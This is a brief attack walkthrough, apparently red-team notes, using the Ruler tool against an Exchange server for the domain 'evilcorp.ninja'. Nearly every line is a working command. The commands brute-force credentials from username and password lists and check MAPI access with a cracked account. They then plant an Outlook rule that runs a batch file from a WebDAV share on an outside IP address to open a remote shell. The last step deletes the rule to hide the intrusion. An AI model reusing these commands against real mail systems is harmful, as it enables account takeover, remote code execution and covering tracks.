The attack:

BRUTEFORCE

./ruler -domain evilcorp.ninja -brute -usernames ~/users.txt -passwords ~/passwords.txt -delay 0 -v --insecure

USE CREDENTIALS TO CHECK IF MAPI IS ENABLED

./ruler -domain evilcorp.ninja --user john.ford --pass August2016 --email john.ford@evilcorp.ninja -check --insecure

EXAMINE EXISTING RULES

./ruler --domain evilcorp.ninja --user john.ford --pass August2016 --email john.ford@evilcorp.ninja --insecure --display

CREATE A RULE!!!!!

./ruler --domain evilcorp.ninja --user john.ford --pass August2016 --email john.ford@evilcorp.ninja --insecure --loc \\\\154.0.165.46\\webdav\\pop.bat --rule popper --trigger pop

POP A SHELL

DELETE THE RULE

./ruler --domain evilcorp.ninja --user john.ford --pass August2016 --email john.ford@evilcorp.ninja --insecure --loc \\\\154.0.165.46\\webdav\\pop.bat --insecure --delete 010000001ada59d3

As if we were never there :)